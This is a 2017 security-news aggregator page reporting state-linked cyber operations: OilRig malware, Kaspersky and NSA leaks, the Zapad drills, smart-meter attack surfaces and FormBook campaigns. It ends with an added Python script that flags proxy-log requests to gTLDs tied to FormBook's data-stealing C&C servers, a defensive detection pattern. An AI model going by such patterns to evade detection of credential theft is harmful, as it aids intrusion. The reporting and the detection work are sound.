- BigBrothers -

Last update 09.10.2017 13:51:26




Iranian Cyberspies Use New Trojan in Middle East Attacks
10.10.2017 securityweek BigBrothers
A cyberespionage group previously linked to Iran has been using a new Trojan in attacks aimed at entities in the Middle East, Palo Alto Networks reported on Monday.

The threat actor, known as OilRig, was recently spotted launching attacks against an organization within the government of the United Arab Emirates (UAE).

When it first discovered the group’s activities back in May 2016, Palo Alto Networks believed the attacks had been carried out by a known group, but researchers later determined that the campaign was actually the work of a new actor, which is now tracked as OilRig.

OilRig has been known to use a remote access trojan (RAT) named ISMDoor, which researchers also identified in attacks launched by another Iran-linked cyberspy group known as Greenbug.

In attacks seen by Palo Alto Networks in July 2017, OilRig had started using a new piece of malware dubbed “ISMAgent,” which appeared to be a variant of the ISMDoor RAT. In even more recent attacks, observed by experts in August 2017, a new injector Trojan was used by the attackers.

The new malware, tracked as “ISMInjector,” is a tool with a sophisticated architecture that includes anti-analysis techniques not previously leveraged by this group.

“The complex structure and inclusion of new anti-analysis techniques may suggest that this group is increasing their development efforts in order to evade detection and gain higher efficacy in their attacks,” Palo Alto Networks researchers said in a blog post.

In the attack aimed at the UAE government, hackers delivered their malware using malicious documents attached to emails with the subject line “Important Issue.” What made the emails interesting was the fact that they came from the targeted organization’s own domain. While experts initially believed that the attackers had spoofed the sender, they later determined that they actually used a compromised Outlook Web Access (OWA) account whose credentials they obtained in a previous phishing attack.

The malicious documents sent to the UAE government, tracked by Palo Alto as “ThreeDollars,” delivered the new ISMInjector Trojan, which in turn dropped a variant of the ISMAgent backdoor by injecting it into a remote process it created.

In order to make analysis of ISMInjector more difficult, the malware’s developers have relied on what researchers call “state machines” to create a new process and inject the payload into that process. Each state is responsible for conducting a particular action and it specifies the next state that should be executed.

Since the states are not executed in sequential order, researchers analyzing the malware have to jump around in the code to determine how it works, which makes it more challenging to investigate the threat. Analysis of the malware is further complicated by the use of a crypter.

Iran appears to have several cyber espionage groups, including APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


North Korea hackers threaten Irish companies with ‘almost daily’ attacks
9.10.2017 securityaffairs BigBrothers

State-sponsored hackers from North Korea are launching almost daily attacks on Irish companies and critical infrastructure
North Korean state-sponsored hackers are launching almost daily attacks on Irish companies and critical infrastructure, and they are also suspected of being responsible for the €4.3m cyber heist on Meath County Council in October 2016.

Ireland is considered a privileged target of nation-state actors due to the presence of many US multinationals.

Defence Minister Paul Kehoe recognized the urgency to rapidly improve the security of national infrastructure against cyber attacks.

The overall cost of cyber attacks on Irish companies has soared from €498,000 in 2014 to €1.7m in 2016, and the situation is expected to get worse in the near future.

“The number of cyber attacks suffered by Irish businesses doubled between 2012 and 2016, but that figure is expected to double or even treble because of recent ransomware attacks.” reported the Irish Independent.

North Korea has recently turned to international cyber robbery to fund its military operations, and Ireland is on the front line of the cyber battle.

“But North Korea has thrown the entire rule book out the window. It is basically engaging in cyber warfare to raise funds and to cause global chaos.” explained the expert Ronan Murphy from Smarttech247.

“There is no safe hiding place anymore. These aren’t ordinary criminal gangs – you are essentially dealing with state cyber intelligence units.”

Murphy attributed the massive WannaCry ransomware attack to North Korea, describing it as financially motivated even though it only netted a measly €120,000 for Pyongyang.


Murphy highlighted the importance of improving security defenses against even more sophisticated cyber attacks.

“These probing attacks are occurring almost 24/7 on Irish networks and, in most cases, the firms involved are simply not aware of it.” added Murphy.

“Smarttech logged an incredible 21 million attacks last year – and the rate of attacks is increasing on a daily basis.” continues the Independent.

According to a recent nationwide cyber security awareness survey, over 171,000 Irish businesses could be vulnerable to ransomware-based attacks.


Cyber Attacks Targeted Interests of Billionaire Chinese Dissident
9.10.2017 securityweek BigBrothers
Two Recent Alleged Cyber Attacks Have More to do with Politics Than Cybercrime

Two little-reported but alleged cyber attacks in recent weeks -- one against the Hudson Institute (a politically conservative think tank), and one against legal firm Clark Hill -- seem to revolve around China's campaign against dissident Guo Wengui (aka Miles Kwok), currently resident in New York and seeking political asylum. In both cases the finger has been pointed at China, and in both cases China has denied any involvement.

The first led to the sudden cancellation of a Hudson Institute event scheduled for October 4: A conversation with Guo Wengui. Hudson Institute said it had detected a cyber attack emanating from Shanghai a few days earlier. Hudson spokesman David Tell played down the effect of the DDoS attack, and blamed the event cancellation on poor planning: "The planning just got away from us and we feel bad," he told the Washington Free Beacon.

The second cyber attack apparently led to law firm Clark Hill withdrawing representation from Wengui, after earlier lodging Wengui's asylum claim. Clark Hill has merely confirmed that it no longer represents Wengui; but Wengui has claimed that it follows the law firm being targeted by Chinese hackers.

Wengui is a Chinese property billionaire wanted in China on corruption charges. In turn, he claims that the Chinese government is a kleptocracy. At a press conference Thursday, he produced what he claimed were 'top secret' Chinese government documents showing that China had sent secret agents into the United States. China claims they are forgeries.

In April, China issued an Interpol red notice on Wengui. These are not arrest warrants. Unlike the European Arrest Warrant (EAW) that has validity throughout the European Union (the UK was obligated to arrest Julian Assange in 2010 because of a Swedish EAW), no Interpol country is required to arrest the subject of a red notice -- it is merely a way of telling all Interpol countries that the subject is wanted in the issuing country.

Wengui's wealth has been estimated at $38 billion, earned through property and other investments. Much of his assets in China have been blocked by the government, where he is reportedly being investigated for at least 19 crimes, ranging from kidnapping, fraud, and rape to money laundering.

The whole debacle comes at an interesting point in US/Sino relations. The U.S. is seeking increased Chinese assistance against North Korea -- and there are some signs of mutual cooperation. U.S. Secretary of State Rex Tillerson was in Beijing between September 28 and October 1, meeting with senior Chinese officials.

At this point, US Cyber Command was still delivering its DDoS attack against North Korea's military spy agency, the Reconnaissance General Bureau (RGB). At the time, the only way into North Korea was through the connection owned by China's China Unicom (Russia has since opened a second connection across the Friendship Bridge between the two countries). Technically, it would be possible for Cyber Command to use this channel without China's knowledge or cooperation. However, the possibility of footprints being left that could trace the attack back to Cyber Command makes it unlikely that it was done without China's knowledge.

Similarly, on the scheduled day of the Hudson Institute event with Wengui, a Chinese delegation was in Washington for a high-level law enforcement and cyber security dialogue between the U.S. and China. The alleged attack was raised by U.S. Attorney General Jeff Sessions during a meeting with China’s Public Security Minister Guo Shengkun, and China pledged to cooperate with an investigation.

The meeting was part of a high level communication channel established between Beijing and Washington following the meeting between President Trump and President Xi Jinping in April. While Trump is keen to get China's cooperation over North Korea, Xi Jinping is keen that nothing rocks the boat too seriously ahead of the 19th Party Congress later this month. Xi Jinping, while being a strict authoritarian, has been engaged in a long-running anti-corruption campaign in China -- although this is thought to be more about strengthening the party's control over the military than about improving civil rights.

On Saturday, the Chinese Ministry of Public Security issued a statement denying any involvement in cyberattacks against the Hudson Institute or Clark Hill. “The Chinese government would like to suggest that the US law enforcement authorities supply China with the detailed information, relevant clues and evidence, so that China could assist in the investigations to identify the real source of such hacking,” the ministry said, adding it would cooperate fully in any investigation.


Extradition of Russian to U.S. on Bitcoin Charges 'Unjust': Moscow
9.10.2017 securityweek BigBrothers
Moscow on Friday slammed a Greek court's ruling that a Russian national accused of helping criminals launder billions of dollars using Bitcoin should be extradited to the United States.

Alexander Vinnik, who headed BTC-e, an exchange he operated for the cyber currency, was indicted by a US court in July on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Vinnik said he would appeal the extradition decision of the Thessaloniki court on Wednesday.

"We consider that the verdict is unjust and violates the norms of international law," the Russian foreign ministry said in a statement.

"Greek authorities received a request from the Russian attorney general that Vinnik be extradited to Russia" which "should have priority, as Vinnik is a Russian citizen," the ministry said.

"Such a ruling is all the more surprising considering the context of friendly relations between Russia and Greece...we hope the relevant Greek authorities will take into account the request of the Russian attorney general (at appeal)."

The final decision on whether to extradite Vinnik will be made by the Greek justice minister.

The Russian has been languishing in a Greek jail since his arrest on July 25 in the tourist resort of Halkidiki, near Thessaloniki.

According to US authorities, Vinnik "stole identities, facilitated drug trafficking, and helped to launder criminal proceeds from syndicates around the world".

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges, but according to the US indictment, it was "heavily reliant on criminals".


HPE allowed Russians to review the code of ArcSight software also used by the Pentagon
9.10.2017 securityaffairs BigBrothers

HPE gave the Russian government access to review ArcSight software that is currently used by corporate and government entities worldwide, including the Pentagon.
The recent news of the alleged abuse of Kaspersky products to steal NSA exploits from the personal PC of a US contractor has overshadowed another equally worrying piece of news.

Another tech giant has come under fire: reports claimed that HPE gave Russian defence agencies access to review software it sold to the Pentagon, the same software supposedly used to protect the agency’s networks.

According to regulatory records seen by the Reuters agency, HPE allowed Russian defence agencies to access the source code of its ArcSight software with the intent to obtain the certification needed to sell its software to the Russian public sector.

The review for the ArcSight software took place last year, while the tension between Washington and Moscow was high due to the increasing number of cyber attacks against U.S. politicians, government agencies, and companies.

“Hewlett Packard Enterprise allowed a Russian defense agency to review the inner workings of cyber defense software used by the Pentagon to guard its computer networks, according to Russian regulatory records and interviews with people with direct knowledge of the issue.” states a blog post published by Reuters.

“The HPE system, called ArcSight, serves as a cybersecurity nerve center for much of the U.S. military, alerting analysts when it detects that computer systems may have come under attack. ArcSight is also widely used in the private sector.”

The ArcSight platform is used by both government and private industry; clearly, the analysis of the code could help the Russian government detect security vulnerabilities that state-sponsored hackers could exploit to target HPE customers, including the Pentagon.

Reuters quoted several former US military sources and former ArcSight employees; HPE told Reuters that no “backdoor vulnerabilities” were uncovered in the Russian review.

Of course, this is not sufficient: do you believe that Russian experts would have reported to HPE the flaws discovered during the review?

“Six former U.S. intelligence officials, as well as former ArcSight employees and independent security experts, said the source code review could help Moscow discover weaknesses in the software, potentially helping attackers to blind the U.S. military to a cyber attack.” continues Reuters.

“It’s a huge security vulnerability,” said Greg Martin, a former security architect for ArcSight. “You are definitely giving inner access and potential exploits to an adversary.”

HPE pointed out that neither the ArcSight source code nor any of its products had been compromised.

The review was carried out by the company Echelon which has close ties to the Russian military. The company operated on behalf of Russia’s Federal Service for Technical and Export Control (FSTEC), the Russian agency tasked with countering cyber espionage.

“Echelon president and majority owner Alexey Markov said in an email to Reuters that he is required to report any vulnerabilities his team discovers to the Russian government.” continues Reuters.

“But he said he does so only after alerting the software developer of the problem and getting its permission to disclose the vulnerability. Echelon did not provide details about HPE’s source code review, citing a non-disclosure agreement with the company.”


From the Russian point of view, it is essential to review the code of any software developed by foreign firms in order to prevent cyber espionage activities like the ones described by Edward Snowden.

The Russian government requires such code analysis before allowing sales to government agencies, in order to prevent foreign intelligence services from placing spy implants in software and hardware components.


British Teen Admits Trying to Hack CIA Chief
7.10.2017 securityweek BigBrothers
A teenager admitted in a British court on Friday to trying to hack into the computers of top US officials, including former CIA chief John Brennan, from his home in the East Midlands region of England.

Kane Gamble, 18, pleaded guilty to ten charges related to the attempted intrusions in late 2015 and early 2016, which targeted the US Department of Justice and an array of senior American security officials.

These included James Clapper, the Director of National Intelligence under President Obama; Jeh Johnson, the former US Secretary of Homeland Security; and a deputy director of the FBI.

Gamble, from Coalville, Leicester -- a small town 110 miles (177 kilometres) northwest of London -- pleaded guilty to eight charges of performing a function with intent to secure unauthorised access, and two charges of unauthorised acts with intent to impair operation of a computer.

He was released on conditional bail ahead of sentencing on December 15.

British judges have sentenced defendants in other hacking cases in recent years to up to two years in prison.

Media reports at the time of the attempted breaches said they were part of a wider "hacktivist" group known as "Crackas With Attitude", which targeted the US officials and their families between October 2015 and February 2016.

The US Justice Department arrested two men in September 2016 in North Carolina on suspicion of belonging to the network.


British teenager admits trying to hack CIA Chief and other top US officials
7.10.2017 securityaffairs BigBrothers

A British teenager admitted in a British court to have attempted to hack into the computers of top US officials, including former CIA chief John Brennan.
On Friday, the British teenager Kane Gamble (18) from Coalville, Leicester, admitted in a British court to have attempted to hack into the computers of top US officials, including former CIA chief John Brennan.


Kane Gamble pleaded guilty to ten charges related to the attempted intrusions that occurred between late 2015 and early 2016.

Gamble pleaded guilty to eight charges of performing a function with intent to gain unauthorized access, and two charges of unauthorized acts with intent to compromise the operation of a computer.

The teenager targeted the US Department of Justice and many other senior American security officials from his home in the East Midlands region of England.

The list of targeted officials is long and includes James Clapper, the Director of National Intelligence under President Obama’s administration and the deputy director of the FBI Jeh Johnson.

The teenager was released on conditional bail ahead of sentencing on December 15.

The teenager was suspected of being a member of the notorious hacking crew ‘Crackas With Attitude’, which targeted US officials between October 2015 and February 2016.

In September 2016, U.S. authorities arrested two alleged members of the Crackas With Attitude group involved in dumping details of officials with the FBI and the DHS.

In September 2017, one of the two men arrested was sentenced to five years in federal prison.


U.S. Believes Russian Spies Used Kaspersky Antivirus to Steal NSA Secrets
7.10.2017 thehackernews BigBrothers

Did you know that the United States government has banned federal agencies from using Kaspersky antivirus software over spying fears?
Though there's no solid evidence yet available, an article published by WSJ claims that the Russian state-sponsored hackers stole highly classified NSA documents from a contractor in 2015 with the help of a security program made by Russia-based security firm Kaspersky Lab.
Currently, there is no way to independently confirm whether the claims about the popular security vendor published by the Wall Street Journal are accurate—and the story does not even prove the involvement of Kaspersky.
"As a private company, Kaspersky Lab does not have inappropriate ties to any government, including Russia, and the only conclusion seems to be that Kaspersky Lab is caught in the middle of a geopolitical fight," Kaspersky said in a statement.
The NSA contractor working with the American intelligence agency, whose identity has not yet been disclosed, reportedly downloaded a cache of highly classified information from government systems and moved it to a personal computer at home, which is a clear violation of known security procedures.
Citing some anonymous sources, the Journal says that the targeted computer was running Kaspersky antivirus—the same app the U.S. Department of Homeland Security (DHS) recently banned from all government computer systems over spying fears.
The classified documents taken home by the contractor contained details about how the NSA breaks into foreign computer networks for cyber espionage operations as well as how it defends its systems against cyber attacks.
Although what role Kaspersky played in the breach is not entirely clear, US officials believe an antivirus scan performed by Kaspersky Lab’s security software on the contractor's computer helped Russian hackers identify the files containing sensitive information.
In response to the WSJ story, Kaspersky CEO Eugene Kaspersky said his company "has not been provided with any evidence substantiating the company's involvement in the alleged incident. The only conclusion seems to be that Kaspersky Lab is caught in the middle of a geopolitical fight."
Also, it is not clear exactly how the files were stolen, but it has been speculated that the antivirus’ practice of uploading suspicious files (malware executables) on the company's server, located in Russia, may have granted the Russian government access to the data.
Another possibility is that Russian hackers stole the confidential data by exploiting vulnerabilities in Kaspersky Lab software installed on the targeted system, according to the person, who asked not to be identified.
"Now, if we assume that what is reported is true: that Russian hackers exploited a weakness in our products installed on the PC of one of our users, and the government agencies charged with protecting national security knew about that, why didn’t they report it to us?" Kaspersky said.
"We patch the most severe bugs in a matter of hours; so why not make the world a bit more secure by reporting the vulnerability to us? I cannot imagine an ethical justification for not doing so."
This breach of NSA classified files, which is being called "one of the most significant security breaches in recent years," occurred in 2015 but was only detected in 2016.
However, it is not clear whether this security incident has any ties to the Shadow Brokers campaign, an ongoing public leak of NSA hacking tools that many officials and experts have linked to the Russian government.
It is another embarrassing breach for the NSA, which has long struggled with contractor security—starting from Edward Snowden to Harold Thomas Martin and Reality Winner.


Russian Hackers Exploited Kaspersky Software to Steal NSA Exploits: Report
6.10.2017 securityweek BigBrothers
Still No Smoking Gun as Russian Hackers Reportedly Exploited Kaspersky Software to Steal NSA Exploits From NSA Contractor's Home Computer

A new report in the Wall Street Journal (WSJ) purports to provide the first evidence that directly ties Russian security firm Kaspersky Lab to the Russian government.

The report states, "Hackers working for the Russian government stole details of how the U.S. penetrates foreign computer networks and defends against cyberattacks after a National Security Agency contractor removed the highly classified material and put it on his home computer, according to multiple people with knowledge of the matter.

"The hackers appear to have targeted the contractor after identifying the files through the contractor's use of a popular antivirus software made by Russia-based Kaspersky Lab, these people said."

The problem with the report is that it offers no evidence and comes from anonymous, unnamed sources: allowing Eugene Kaspersky to immediately respond, "The first statement sounds like the script of a C movie, and again -- disclosed by anonymous sources (what a surprise)."

Without specific evidence, the WSJ describes several known facts and assumes a relationship. It is reported that an unnamed NSA contractor removed sensitive data from the NSA and stored it on his home computer. That contractor had Kaspersky Lab software installed at home. The Kaspersky Lab software scanned all the new files (it's what antivirus does), collecting unknown files for deeper analysis. Russian government hackers then targeted the contractor and stole the NSA documents.

There is a gap in this chain of events -- between Kaspersky automatically scanning the files and the Russian government hacking the contractor. The reported implication, strenuously denied by Kaspersky Lab, is that the company informed the Russian government of the presence of NSA files on this contractor's computer.

The reality is, based on all public data so far, any direct link between Kaspersky Lab and the Russian government remains speculation only. Now it could be that the US intelligence community has additional evidence that it is not disclosing; but this report from the WSJ is no evidence-based smoking gun.

There is an alternative scenario (which like direct Kaspersky involvement, is purely conjecture). It is highly likely that Russian intelligence would be aware of individual NSA contractors. Given that two contractors are already known to have leaked NSA documents (Edward Snowden and Harold Martin), it would be tempting to target the home computers of known contractors. It is possible that Russian hackers were already present on the contractor's computer when he brought home the NSA files. In this scenario, Kaspersky's involvement is limited to the coincidence of being the antivirus of choice by the contractor.

A second alternative is that Kaspersky Lab software has been unknowingly compromised by the Russian government. This gains some credence from the recent compromise of Avast's CCleaner, allegedly by the Chinese government (Avast is another antivirus company). The CCleaner incident, however, was rapidly detected and quickly solved.

Kaspersky has admitted that its own corporate network has been compromised in the past. In the Spring of 2016, Kaspersky Lab detected an intrusion of its internal systems while testing a prototype of technology designed to detect advanced persistent threats.

At the time, Eugene Kaspersky explained that one reason it was hacked could be that the spies were interested in the inner workings of the company. "We obviously have our share of technological secrets as we’re a competitive business, but I can’t think of anything really top secret," Kaspersky said. "Maybe the idea was to steal our technologies, source code, know-how and ideas to support the attackers’ own software development," he added.

The WSJ report provides only ambiguous indications of how the Russian hackers got the data off the contractor's computer. It includes the statement, "The breach is the first known incident in which Kaspersky software is believed to have been exploited by Russian hackers to conduct espionage against the U.S. government."

This could be interpreted as the supposed collusion between Kaspersky and the Russian government; or that the hackers exploited a vulnerability in the software itself. Assuming the latter, Kaspersky responded, "Now if we assume, that what is reported is true: that Russian hackers exploited a weakness in our products installed on a PC of one of our users, and respected government agencies concerned of national security knew about that, why didn't they report it to us?... I can't imagine an ethical justification for not doing so."

Kaspersky has addressed several remotely exploitable vulnerabilities in its products over the years, along with just about every other AV vendor, making a possible scenario that Kaspersky's software was exploited by the Russian hackers, without any knowledge or cooperation of Kaspersky Lab.

The WSJ report does, however, provoke further considerations. The first is how the U.S. government can allow insiders to walk out (literally or figuratively) with such highly sensitive data: Bradley Manning, Edward Snowden, Martin, and now +1. If the NSA cannot control the insider threat, what hope is there for any commercial organization?

The second question is whether this breach is the source of the Shadow Brokers trove of NSA exploits. There has been conjecture in the past that Martin was the source -- but the WSJ report specifically comments, Martin "allegedly removed massive amounts of classified information from the agency's headquarters and kept it at his home, but wasn't thought to have shared the data." The implication is that Martin is not the source of the Shadow Brokers' data.

Is this new breach the source? The timing fits. The incident apparently occurred in 2015, but the NSA only became aware in spring of 2016. That's exactly the time that Shadow Brokers made their first announcements and started leaking NSA exploits that fit the WSJ's description of "details about how the NSA penetrates foreign computer networks, the computer code it uses for such spying and how it defends networks inside the U.S."

As soon as the NSA was aware of the loss of its exploits, their value to the Russian government would diminish -- and the most damaging action would be to make them public.

The reality is that all of this is conjecture. The DHS has banned the use of Kaspersky software by any government agency, stating, "The risk that the Russian government, whether acting on its own or in collaboration with Kaspersky, could capitalize on access provided by Kaspersky products to compromise federal information and information systems directly implicates U.S. national security." It talks about risk, not about proof.

Concern over the risk is understandable and proper, and keeping Kaspersky software out of government would be reasonable. However, the U.S. government has chosen to take a very public stance -- without proof -- against the Russian company.

This adds fuel to Kaspersky's own suspicions. In a statement emailed to SecurityWeek, it said, "As a private company, Kaspersky Lab does not have inappropriate ties to any government, including Russia, and the only conclusion seems to be that Kaspersky Lab is caught in the middle of a geopolitical fight."

Evidence of that geopolitical fight is all around us, from U.S. Cyber Command attacking the North Korean spy agency and Putin's response of doubling Pyongyang's internet access, to Russia's interference in the 2016 American presidential election and its use of the Ukraine and Baltic areas to test cyber capabilities.

*Additional reporting by Mike Lennon


Zapad drills – Russia may have tested cyber weapons on Latvia
6.10.2017 securityaffairs BigBrothers

According to intelligence experts, the recent Zapad drills conducted by Russia simulated an attack on all the Baltic countries and included the use of cyber weapons.
Baltic and NATO officials claim Russia was behind an outage in Latvia’s mobile communications network before Russia’s war games in September, code-named Zapad. According to the experts, Russia may have tested one of the weapons in its cyber arsenal.

The cyber attack interrupted the mobile network along Latvia’s western coast for seven hours on Aug. 30. The Russian army may have used a communications jammer aimed towards Sweden from Russia’s Baltic outpost of Kaliningrad.

A Swedish defense ministry spokesperson said the ministry was not aware of any jamming attempt directed at Swedish infrastructure.

“Russia appears to have switched on a mobile communications jammer in Kaliningrad, a very powerful one that wasn’t aimed at Latvia, but towards Gotland, the Aland Islands,” explained Karlis Serzants, the deputy chairman of the Latvian parliament’s National Security Committee.

“One of the edges (of the beam) affected Latvia too,” he told Reuters after being briefed by Latvian intelligence.


Latvian officials believe the Russian hackers also targeted Latvia’s emergency services’ 112 hotline, which began experiencing problems on Sept. 13.

“Russia simulated an attack on all Baltic countries,” said Lithuania’s Defence Minister Raimundas Karoblis.

Reuters contacted the Russian Defence Ministry but did not receive any comment on the allegations.

The experts also observed other incidents linked to the Zapad drills; the first revolves around the hacking of soldiers’ smartphones. It seems that Russian soldiers used both drones carrying hacking tools and a mobile telephone tower similar to stingray equipment. The sophistication of the attacks leaves little doubt that there is some state sponsorship involved.

According to the WSJ, one victim, U.S. Army Lt. Col. Christopher L’Heureux, “said at least six soldiers he commands have had phones or Facebook accounts hacked. He said he suspects the incidents were meant as a message that Russian intelligence forces were tracking him, could crack his passwords and wanted to intimidate his soldiers.”

WSJ reports, “Military cyberespionage experts said the drone flights and cellphone data collection suggest Russia is trying to monitor troop levels at NATO’s new bases to see if there are more forces present there than the alliance has publicly disclosed.”

NATO intelligence experts believe that tests of cyber capabilities were at the core of the Zapad drills.
Unfortunately, not all European allies in NATO are ready to repel such attacks, and NATO’s cyber strategy is purely defensive.

A NATO diplomat highlighted the ability of Russian units to intercept or jam civilian networks “within a significant radius and with relative ease”, posing serious risks for NATO communications and radars.

There is no doubt that the Zapad drills confirmed that Russia has developed “a significant electronic warfare capability” over the past three years.

“A lot of this was on display during the (Zapad) exercises,” U.S. Army Lieutenant General Ben Hodges, who heads U.S. Army forces in Europe, told reporters.


Securing smart grid and advanced metering infrastructure
6.10.2017 securityaffairs BigBrothers

The year is 2020; economic, military and cultural tension between Russia and the US is high.

You are in the London office, joining a video meeting with the sales team in America. The American team enthusiastically presents the sales achievements of the recent quarter; then, suddenly, the call is disconnected. You try to re-establish the connection, without success.

You receive a WhatsApp message on your mobile: “we have an electricity outage in the office, we are leaving the conference room. We will reschedule”.

One hour later, reports start to pop up in the media announcing an outage in dozens of areas across the US.

A few hours later, tweets from news channels indicate that the US president is about to make a special announcement about the power outage in the US.

You turn on the television and the president begins to speak: “Today we are experiencing a national tragedy. Dozens of areas in the US have been cut off from power, in what appears to be a cyber-attack on our country.”

“I have spoken with the director of the FBI, who confirmed that millions of meters have been turned into bricks.”

“I have ordered the full resources of the federal government to go to help the victims and their families, and to conduct a full-scale investigation to hunt down and find the people who committed this act.”

Science fiction? Let us review some examples from recent years.

Black Hat as an incubator

The Black Hat conference is a meeting place for cyber-security professionals from around the world. On several occasions it has hosted presentations of vulnerabilities and exploits affecting smart electricity metering devices and networks.

It began in 2008 when Cleveland presented how to send a disconnect message to millions of smart meters on the power grid.

A year later, P. McDaniel and S. McLaughlin demonstrated how to change the energy usage of the smart meter.

In 2014, researchers from universities in the United States and China introduced the “puppet attack”, which increased the network traffic of a smart meter by up to 20% and could potentially lead to a denial-of-service condition.

From the cyber security conferences to reality

In recent years there have been two cyber-attacks on power plants in the largest country in Europe, Ukraine, which for the first time in history succeeded in disrupting and cutting power in a country.

The cyber-attacks, which were part of the Russia-Ukraine war, began in December 2015, when 230,000 people were left without electricity for one to six hours as attackers hit three electricity providers in Ukraine. The attackers demonstrated a variety of techniques, including spear-phishing emails, variants of the “BlackEnergy” malware, and Microsoft Office documents carrying the malware, to gain a foothold in the networks.

A year later, another cyber-attack hit the capital, Kiev, and citizens were disconnected from power for an hour: a malware framework called “Industroyer” or “CrashOverride”, specifically designed to attack electric grids, succeeded in shutting down a Ukrainian power plant.

Lessons learned?

In addition to the two cases attributed to Russia, there was another case in June 2017, when the Chernobyl nuclear power plant was hit by the damage caused by the Petya/NotPetya malware, which also affected rail stations, banks, and parliamentary activities.

Three conditions for a cyber attack to materialize

An analysis of the events in Ukraine indicates that for a cyber-attack to materialize, three conditions must exist: opportunity, ability, and motivation.

Opportunity: every day, dozens to hundreds of new security vulnerabilities are discovered across different platforms; some of them are published and some are not.

These vulnerabilities are a window of opportunity for potential attackers to exploit.

Ability: in an age of HaaS (hacking as a service), hacktivism, organized crime and hacker groups that publish nation-state cyber tools, executing a major cyber-attack has become easier, faster and smarter than ever.

Motivation: what causes the attacker to attack? There are various reasons. Continuing the opening scenario, it was an anonymous act intended to totally disrupt the normal life of US citizens.

Hardware-level attack example

This part of the article focuses on the advanced metering attack surface. The smart metering infrastructure consists of three main components:

Smart meter
Meter hub
Data management system

These components are part of a heterogeneous, multi-vendor system with interfaces that communicate using standards such as IEC 62056.

Smart meters are usually installed in public places such as residential and business areas, and their function is to identify and calculate power consumption. The meters are connected to the data management system through hubs, which enable the service provider to manage the meter remotely and to provide additional innovative services to customers.

Schematically, a smart meter has five main components:

1. Main control unit
2. Identification and calculation unit
3. PLC communication unit
4. Radio communication unit
5. Optical management interface

Each of these components has an attack surface.

The next part of the article focuses on the attack surface of the control unit.

The main control unit orchestrates the main functions of the meter and includes microcontrollers, memory chips and firmware. It is exposed to hardware and firmware attacks by an attacker who has physical access to it: such an attacker can install compatible malicious hardware to help steal the encryption keys, or use an unprotected JTAG interface to extract data such as passwords from the central control unit.

An attacker can also use an unprotected JTAG interface to run malicious firmware that allows the attacker to control information transmitted from the data management system and to add external interfaces, such as a cellular modem, for remote connection.

Firmware and hardware manipulation can also be used to steal electricity and alter recorded usage, which has major implications for customer privacy and for the provider’s cash flow (theft of electricity).

We should embrace cyber security initiatives as we embrace innovation and new technologies. The evolution of the techniques and technologies used by attackers is a wake-up call for regulators, leading power companies and vendors to treat cyber defense like safety, reliability and productivity, in order to minimize the ability and opportunity to use a cyber attack as an act of war.


FormBook Campaigns Target U.S., South Korea
6.10.2017 securityweek BigBrothers
Various industries in the United States and South Korea were targeted during the third quarter of the year in several high-volume FormBook distribution campaigns, FireEye reports.

As part of these campaigns, the attackers used various delivery mechanisms, including PDF documents containing download links, DOC and XLS files with malicious macros, and archive files containing executables.

The security researchers noticed that the PDF and DOC/XLS documents were mainly used to target organizations in the U.S., while the archives were used both in the U.S. and South Korea attacks. Impacted sectors included aerospace, defense contractors, and manufacturing.

The attacks were aimed at infecting victims’ computers with the FormBook information stealer, a piece of malware being sold through various hacking forums since early 2016 and which recently registered an increase in activity.

FormBook was designed to steal a variety of information from the infected machine, including keystrokes, clipboard contents, HTTP/HTTPS/SPDY/HTTP2 forms and network requests, passwords from browsers and email clients, and screenshots, and send it to the command and control (C&C) server.

To perform its malicious routines, the malware injects itself into various processes and also installs the necessary function hooks to log keystrokes, steal clipboard contents, and extract data from HTTP sessions. Furthermore, the malware can execute commands received from the C&C to download and execute files, start processes, shut down and reboot the system, and steal cookies and local passwords.

The threat typically uses C&C domains from newer generic top-level domains (gTLDs) such as .site, .website, .tech, .online, and .info. The domains associated with the malware’s recent activity have been registered using the WhoisGuard privacy protection service, while the server infrastructure is hosted by a Ukrainian company, FireEye discovered.
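As an added illustration (not code from FireEye or the original article), the following Python script scans constructed proxy log lines for outbound requests whose destination sits on one of the newer gTLDs named above and flags them for triage; the log format and client addresses are made up, and a hit is a lead rather than proof of infection, since legitimate sites also use these TLDs.

```python
import re
from urllib.parse import urlsplit

# Newer gTLDs the article associates with FormBook C&C domains.
FORMBOOK_GTLDS = frozenset({"site", "website", "tech", "online", "info"})

# Constructed proxy log lines (not real traffic): epoch client "METHOD URL" status
SAMPLE_PROXY_LOG = """\
1507280001.123 10.0.3.17 "POST http://update-check.site/gate.php" 200
1507280002.456 10.0.3.17 "GET http://www.example.com/index.html" 200
1507280003.789 10.0.3.42 "GET http://cdn.example.org/lib.js" 304
1507280004.012 10.0.3.42 "POST http://sync-service.online/ping" 200
1507280005.345 10.0.3.99 "GET http://docs.example.info/manual.pdf" 200
this line is deliberately malformed and must be skipped
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+"(?P<method>[A-Z]+)\s+(?P<url>\S+)"\s+(?P<status>\d{3})$'
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["host"] = (urlsplit(rec["url"]).hostname or "").lower()
    return rec


def last_label(host):
    """Return the final DNS label (the TLD), e.g. 'site' for 'a.b.site'."""
    host = host.rstrip(".")
    return host.rsplit(".", 1)[-1] if "." in host else ""


def find_suspect_requests(log_text, watched_tlds=FORMBOOK_GTLDS, post_only=False):
    """Return records whose destination TLD is in watched_tlds.

    post_only=True narrows the search to POSTs, which is where a stealer
    sending harvested forms and keystrokes to its C&C would show up.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if post_only and rec["method"] != "POST":
            continue
        tld = last_label(rec["host"])
        if tld in watched_tlds:
            hits.append({"client": rec["client"], "host": rec["host"],
                         "tld": tld, "method": rec["method"]})
    return hits


def hosts_by_client(hits):
    """Group flagged hosts per client so repeat beaconing from one machine stands out."""
    grouped = {}
    for h in hits:
        grouped.setdefault(h["client"], set()).add(h["host"])
    return {client: sorted(hosts) for client, hosts in grouped.items()}


if __name__ == "__main__":
    for h in find_suspect_requests(SAMPLE_PROXY_LOG):
        print(f"{h['client']} -> {h['host']} ({h['method']}, .{h['tld']})")
```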

